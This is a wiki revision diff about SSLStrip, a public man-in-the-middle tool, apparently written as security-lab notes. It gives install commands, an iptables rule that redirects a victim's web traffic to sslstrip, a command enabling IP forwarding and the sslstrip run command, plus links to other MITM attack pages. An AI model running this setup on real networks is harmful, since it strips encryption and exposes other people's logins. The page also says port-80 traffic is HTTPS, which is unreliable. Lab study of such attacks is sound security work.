SSLStrip: Difference between revisions
From charlesreid1
| Line 4: | Line 4: | ||
=Overview= | =Overview= | ||
==Source Code== | |||
Github: https://github.com/moxie0/sslstrip | |||
Moxie's page: https://moxie.org/software/sslstrip/ | |||
==Installing== | ==Installing== | ||
| Line 29: | Line 35: | ||
Important tags: | Important tags: | ||
<pre> | |||
-w - specifies log file | -w - specifies log file | ||
| Line 36: | Line 43: | ||
-l port - port to listen on | -l port - port to listen on | ||
</pre> | |||
==Basic Usage== | ==Basic Usage== | ||
| Line 46: | Line 54: | ||
Now any HTTPS connections made to it are turned into HTTP connections, and their encryption layer stripped. SSLStrip also keeps track of which requests have been stripped, so that when the HTTP response from the sheep is received, it is forwarded along to the server as an HTTPS response. | Now any HTTPS connections made to it are turned into HTTP connections, and their encryption layer stripped. SSLStrip also keeps track of which requests have been stripped, so that when the HTTP response from the sheep is received, it is forwarded along to the server as an HTTPS response. | ||
Also make sure your machine forwards packets it receives: | |||
<pre> | |||
$ echo "1" > /proc/sys/net/ipv4/ip_forward | |||
</pre> | |||
Now run sslstrip: | Now run sslstrip: | ||
Revision as of 22:10, 25 October 2017
A tool from Moxie Marlinspike
Also see SSLSniff
Overview
Source Code
Github: https://github.com/moxie0/sslstrip
Moxie's page: https://moxie.org/software/sslstrip/
Installing
On Kali:
$ apt-get install sslstrip
On other:
$ git clone https://github.com/moxie0/sslstrip.git $ cd sslstrip $ python setup.py build && python setup.py install
Getting Help
$ sslstrip -h
Important tags:
-w - specifies log file -p - logs only SSL posts -a - logs all SSL and HTTP traffic -l port - port to listen on
Basic Usage
SSLStrip listens for traffic on a particular port, so we need to use Iptables to listen for HTTPS traffic and forward it selectively to SSLStrip. We'll assume SSLStrip is running on port 6666.
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666
Now any HTTPS connections made to it are turned into HTTP connections, and their encryption layer stripped. SSLStrip also keeps track of which requests have been stripped, so that when the HTTP response from the sheep is received, it is forwarded along to the server as an HTTPS response.
Also make sure your machine forwards packets it receives:
$ echo "1" > /proc/sys/net/ipv4/ip_forward
Now run sslstrip:
$ sslstrip -l 6666
Flags
 |
monkey in the middle attacks in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker.
Wireless Attacks: MITM/Wireless Wired Attacks: MITM/Wired
Layer 1 and 2 MITM Attacks: Network Tap: MITM/Wired/Network Tap Evil Twin Attack: Evil Twin · MITM/Evil Twin
Layer 3 and 4 MITM Attacks:
ARP Poisoning: MITM/ARP Poisoning Traffic Injection/Modification: MITM/Traffic Injection DNS Attacks: MITM/DNS · Bettercap/Failed DNS Spoofing Attack · Bettercap/Failed DNS Spoofing Attack 2 DHCP Attacks: MITM/DHCP WPAD MITM Attack: MITM/WPAD Port Stealing: MITM/Port Stealing Rushing Attack: MITM/Rushing Attack Attacking HTTPS: MITM/HTTPS
Session Hijacking: MITM/Session Hijacking
Toolz:
SSLSniff · SSLStrip · Frankencert
MITM Labs: {{MITMLabs}}
Category:MITM · Category:Attacks · Category:Kali Attack Layers Template:MITMLabs · Template:MITMFlag Flags · Template:MITMFlag · e |